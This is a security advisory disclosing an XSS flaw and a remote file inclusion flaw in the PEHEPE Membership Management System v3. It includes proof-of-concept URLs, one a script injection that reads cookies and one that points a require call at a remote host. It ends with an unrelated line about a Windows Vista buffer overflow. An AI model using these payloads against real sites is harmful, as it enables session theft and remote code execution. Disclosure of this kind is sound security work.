- Application: PEHEPE MemberShip Management System
(http://www.pehepe.org/UYELİK3)
- Affected Version : v3 ( maybe older versions..)
- Risk : Critical
-- Details[0] : XSS Vulnerability
An attacker can manupulate the value of $kul_adi, if s/he opens
sol_menu.php directly.
Sol_menu.php is an included page, but the attacker can access it directly.
So, the value of $kul_adi
can be changed from the address bar.
-- Proof of Concept:
http://target_site/script_path/sol_menu.php?kuladi="><script>alert(docum
ent.cookie)</script>
-- Details[1] :Remote Code Execution Vulnerability
There is a "require" command in sol_menu.php. The attacker can bypass the
constant UYE_SEVIYE using a , querystring like "misafir[]=UYE_SEVIYE". So
the remote code is executing. As a result, the attacker can change the
value of the first parameter of the require function which is named as
uye_klasor.(dir for remote url)
-- Proof Of Concept:
sol_menu.php?uye_klasor=http://www.example.org&misafir[]=UYE_SEVIYE
-- Note : For using these vulnerabilities, register_globals must be on.
Original URL :
http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-mult
iple-vulnerabilities/
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.